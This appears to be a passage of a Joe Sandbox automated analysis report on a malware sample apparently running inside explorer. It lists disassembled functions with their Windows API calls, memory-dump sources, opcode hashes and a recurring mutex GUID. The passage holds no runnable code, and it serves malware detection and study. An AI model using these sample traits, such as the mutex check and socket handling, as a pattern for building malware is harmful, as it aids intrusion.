                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleMutexOpenSleep
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2969294566-555727378
                          • Opcode ID: 441557c633a345505624ff61e171cf7fb03210bb1cc255660fe9b56885f110e2
                          • Instruction ID: 10c77c648196905f4cfd424be69367905c96ed5e51dd1cf040f88655cb73aee7
                          • Opcode Fuzzy Hash: 441557c633a345505624ff61e171cf7fb03210bb1cc255660fe9b56885f110e2
                          • Instruction Fuzzy Hash: 07E04F30105A5083E71CEB14F8083EA62B1F785345F100039E35793664DF3EC885C702
                          Function 011BE5D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(?,?,000000FF,011BE619,?,?,00000028,011BC7F1,?,?,?,011C06FC,?,?,00000000,011C0C0D), ref: 011BE5DF
                          • GetProcAddress.KERNEL32(?,?,000000FF,011BE619,?,?,00000028,011BC7F1,?,?,?,011C06FC,?,?,00000000,011C0C0D), ref: 011BE5F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 67fd304b8d5c5dfc8f69313dee537c28d2a599d129ff7dd232d388c1c2320c93
                          • Instruction ID: 64aa0fe3a5ba5bd3c435c3cdb0ec9f22977f2b8f015e787d03a23880519b9b27
                          • Opcode Fuzzy Hash: 67fd304b8d5c5dfc8f69313dee537c28d2a599d129ff7dd232d388c1c2320c93
                          • Instruction Fuzzy Hash: 9FD05B307C370042FF1D5B94A8C83E42BA09B4C702F481428C61E06351DF7CC5D9C380
                          Function 0119EC2A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EBE6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 0536936bd104f7e511559acd778527aa54bdbdc1e5228892e3991640a40c1caf
                          • Instruction ID: 26ee8cce5bd2b2f8c63fba57fda5a20e1c87af02ba5dc068a3400b8ffa9c885a
                          • Opcode Fuzzy Hash: 0536936bd104f7e511559acd778527aa54bdbdc1e5228892e3991640a40c1caf
                          • Instruction Fuzzy Hash: 1CE0463110AA8081E76CFB24F8083EA72A1F788305F004839D3DBD2AA4CF38C089C712
                          Function 0119ECB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EC73
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 56660e23fab4dcdc456bdd07bfbcca192f9671feb55bbfd65129424a54c7b959
                          • Instruction ID: bb92daf6222378ec754b79c46ac8ae7e2ccbd8ff05cbd7f68278dec3d8f4a68e
                          • Opcode Fuzzy Hash: 56660e23fab4dcdc456bdd07bfbcca192f9671feb55bbfd65129424a54c7b959
                          • Instruction Fuzzy Hash: B4E04F30105AC4C1E77CEB15F8883EA62A1F784704F448429D3DBD66A8CF38C489DB41
                          Function 011A7E10 Relevance: 6.4, APIs: 5, Instructions: 179stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal
                          • String ID:
                          • API String ID: 2140729754-0
                          • Opcode ID: bd9faf728ad4c72ec4bacf9dd23215c0e2a2fa92f6ce5d9ceb5c19a18cda9d0b
                          • Instruction ID: 87bd3bea0a6debbe09f545340596b108f8038c551ae1a00238fa596b533cb465
                          • Opcode Fuzzy Hash: bd9faf728ad4c72ec4bacf9dd23215c0e2a2fa92f6ce5d9ceb5c19a18cda9d0b
                          • Instruction Fuzzy Hash: 6181CA76619A84CACB68CB29E48436ABBA0F3C8B95F504125E7DE83B58DF7DC545CF00
                          Function 011A8300 Relevance: 6.4, APIs: 5, Instructions: 175stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal
                          • String ID:
                          • API String ID: 2140729754-0
                          • Opcode ID: 5f8aa4ab87cad69a3514eba26cde1d022795cdbff8f0086349863da9b0deaea0
                          • Instruction ID: 1b1303424db48399e3ee2a11784896e29e3dc415a61a3a508c795779e0e60557
                          • Opcode Fuzzy Hash: 5f8aa4ab87cad69a3514eba26cde1d022795cdbff8f0086349863da9b0deaea0
                          • Instruction Fuzzy Hash: 5981CA76619A84CAC768CB19E48476ABBE1F7C8B95F504125EBCEC7B28DB7CC4458F00
                          Function 011AE4D0 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc
                          • String ID:
                          • API String ID: 3098330729-0
                          • Opcode ID: 95c7c02cb5a9c3c0012149c6f5b132b71bb915bcad97683c1d37726ad4c63fb8
                          • Instruction ID: 212903bb007506be579d2453d147dea973817b16daf561ef316732fcf1c670cc
                          • Opcode Fuzzy Hash: 95c7c02cb5a9c3c0012149c6f5b132b71bb915bcad97683c1d37726ad4c63fb8
                          • Instruction Fuzzy Hash: A011A47A119B4486D728AF55F48439ABBA1F7C8798F440629EB8E43B68DF7CC585CF00
                          Function 0119FD90 Relevance: 6.2, APIs: 4, Instructions: 206comCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize$CreateInstanceSecurityUninitialize
                          • String ID:
                          • API String ID: 374467530-0
                          • Opcode ID: 01f4831329a5563387f89c4824883f088de12b8d18de76738e488f0d589c6ac1
                          • Instruction ID: 907812c4ec16dac64fabf1bee2466978c5fc67341fb0a4bea29caba271c888ba
                          • Opcode Fuzzy Hash: 01f4831329a5563387f89c4824883f088de12b8d18de76738e488f0d589c6ac1
                          • Instruction Fuzzy Hash: 4DA1F636209AC995DBB4DB11E8983DFB7A1F3D8794F804126DA8D43BA8DF78C549CB40
                          Function 011B0E30 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B0AC0: LocalAlloc.KERNEL32 ref: 011B0B2C
                          • VirtualFree.KERNEL32 ref: 011B1222
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFreeLocalVirtual
                          • String ID:
                          • API String ID: 3333721195-0
                          • Opcode ID: 76c2b0fe22ffe321a275c67454cdda88111c855abae9c27ec7195a6d11e406fb
                          • Instruction ID: 46a0766699e2b31e852c094fffe60702100a50efa8a29586ae43d87ab7080937
                          • Opcode Fuzzy Hash: 76c2b0fe22ffe321a275c67454cdda88111c855abae9c27ec7195a6d11e406fb
                          • Instruction Fuzzy Hash: 58A1A836619B88C6DB64CB59F4907AAB7A0F7C8B94F514115EACE83B28DF3CC454CB01
                          Function 011C20B8 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _errno.LIBCMT ref: 011C2106
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C2111
                          • DecodePointer.KERNEL32(?,?,?,?,?,011C0EAC,?,?,?,?,011BC4FE,?,?,?,?,011BC523), ref: 011C21C0
                          • _lock.LIBCMT ref: 011C21EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                          • String ID:
                          • API String ID: 27599310-0
                          • Opcode ID: eaaec147ed81c0c0dc5c3833a3db641d4c97e0906736fbf4571d3f785fcdefcf
                          • Instruction ID: 86b1158b0f4b98ccf6b42cbd1f09187ddf195d24951fc65303914910ae754c06
                          • Opcode Fuzzy Hash: eaaec147ed81c0c0dc5c3833a3db641d4c97e0906736fbf4571d3f785fcdefcf
                          • Instruction Fuzzy Hash: B951C33A60874097EB2DDF29E8803BA7B62F7E5F54F15452EDB9A43728DB38C542C201
                          Function 011C3F0C Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B951C: _getptd.LIBCMT ref: 011B952E
                          • _errno.LIBCMT ref: 011C3F4A
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C3F54
                          • _errno.LIBCMT ref: 011C3F78
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C3F82
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo$_getptd
                          • String ID:
                          • API String ID: 1297830140-0
                          • Opcode ID: cf02349e387d3e4dfecf3681c0094f0a920e4057bdb0d520093da4d2c6150caa
                          • Instruction ID: 65a1a1c685e55d7de5cd2c7515e1f35bc18e50af0030cc01595667f88e6eebc7
                          • Opcode Fuzzy Hash: cf02349e387d3e4dfecf3681c0094f0a920e4057bdb0d520093da4d2c6150caa
                          • Instruction Fuzzy Hash: 334113722187C286DB29DF29D1D42AE7BA0F7A4FD4F058129DB9A43B15CF38C456CB42
                          Function 011BB138 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B8678: _getptd.LIBCMT ref: 011B867C
                          • _getptd.LIBCMT ref: 011BB177
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          • _SetImageBase.LIBCMT ref: 011BB24A
                          • _getptd.LIBCMT ref: 011BB278
                          • _getptd.LIBCMT ref: 011BB286
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BaseImage_amsg_exit
                          • String ID:
                          • API String ID: 2306399499-0
                          • Opcode ID: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                          • Instruction ID: 089d7860cd9b975172f05b05b3090caa28e26cd153f3238ef7805b27c9051967
                          • Opcode Fuzzy Hash: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                          • Instruction Fuzzy Hash: 8931B433305A4285DA2DAB1AE4C02EDABA5FBA5FDDF558621CE5943B70DB38D482C344
                          Function 011B6F00 Relevance: 6.1, APIs: 4, Instructions: 63synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 888b41058b39ff49698322652d937c363c2f88c4d926ece529eddb611b94049f
                          • Instruction ID: beb9c96f049136cabad3f75c88887e48a080399c931c87a99e6979c77c19fa21
                          • Opcode Fuzzy Hash: 888b41058b39ff49698322652d937c363c2f88c4d926ece529eddb611b94049f
                          • Instruction Fuzzy Hash: 6A31A432201B00C1DA28CB19E8D53E9A7B1F7E8B09F95166ED65F467B0DF3DDA86C604
                          Function 011B6F0E Relevance: 6.1, APIs: 4, Instructions: 61synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: bd4f2e530ef6c833281bc831b4e698a4f9f1fd3fa1c855f339cada12b6746046
                          • Instruction ID: d818c5a6f880d72c1d946ca469214a9896302f2f3b7a1d595565560c12302bc2
                          • Opcode Fuzzy Hash: bd4f2e530ef6c833281bc831b4e698a4f9f1fd3fa1c855f339cada12b6746046
                          • Instruction Fuzzy Hash: 38319532201B00C1DA28CB19E8D53E9A7A1F7E8B09F95166ED65F467B0DF3DDA86C604
                          Function 011B6983 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                          • String ID:
                          • API String ID: 3044467104-0
                          • Opcode ID: 81ccbe93b8fc7bd16980f115d78441d3d5af4185a1ed9f96ba58278dc336bfb5
                          • Instruction ID: aa42db2ca95ef6643bc3354237ed789073272fa203de85142811fd94d617737c
                          • Opcode Fuzzy Hash: 81ccbe93b8fc7bd16980f115d78441d3d5af4185a1ed9f96ba58278dc336bfb5
                          • Instruction Fuzzy Hash: 8021B832159A84C6E73ADB18E4897DAB370F79C749F140215D2CA92A58CB7EC455CF00
                          Function 011B6574 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
